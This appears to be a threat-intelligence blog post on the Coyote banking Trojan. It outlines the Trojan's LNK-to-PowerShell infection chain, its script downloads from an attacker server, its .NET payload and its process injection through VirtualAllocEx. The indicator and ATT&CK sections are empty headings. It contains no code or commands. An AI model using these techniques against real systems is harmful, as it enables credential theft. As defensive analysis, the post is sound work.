The Coyote Trojan, also known as the Coyote Banking Trojan, is a type of malware that primarily targets financial institutions and their users. Discovered in early 2024, it has expanded its reach to affect over 1,030 websites and 73 financial institutions.
This Trojan employs a stealthy approach, using LNK (shortcut) files and PowerShell commands to deliver its payload. This multi-stage infection chain helps it evade traditional antivirus solutions that mainly scan for executable files. Once deployed, the Coyote Trojan can perform various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.
The Coyote Trojan is notable for its ability to manipulate security objects and inherit permissions, making it a sophisticated and dangerous threat in the cybersecurity landscape.
Infection Chain:
Initial Vector: LNK Files
The infection starts when the victim opens a malicious LNK (shortcut) file, triggering an embedded PowerShell command within it.
PowerShell (.PS1) Script:
This PowerShell script connects to a server controlled by the attacker, downloading additional malicious scripts. This allows the attacker to maintain control over the infection and deliver further payloads.
The downloaded scripts perform several tasks, such as altering system settings, disabling security tools, and setting the stage for the final payload. These actions help the malware avoid detection and establish a persistent presence on the system.
Payload .NET Executable:
The .NET Framework is a software development platform developed by Microsoft, offering a wide range of libraries, tools, and runtime environments for building and running applications. It supports several programming languages, including C#, VB.NET, and F#, and is commonly used for developing Windows desktop applications, web apps, and services. The framework provides key features like memory management, security, and error handling, helping developers create efficient and scalable software.
However, Windows malware authors also use the .NET Framework for malicious purposes, exploiting its capabilities to create harmful applications and execute malicious code.
Main Entry Point of the Malware:
VirtualAllocEX:
VirtualAllocEx is a Windows API function that allows one process to allocate memory in another process's address space. Malware creators often use VirtualAllocEx to inject malicious code into a target process’s memory, enabling execution of the payload without writing it to disk. This makes detection more difficult for traditional antivirus software.
Indicator of Compromise (IOCs):
MITRE ATT@CK MATRIX:
Happy Hunting !!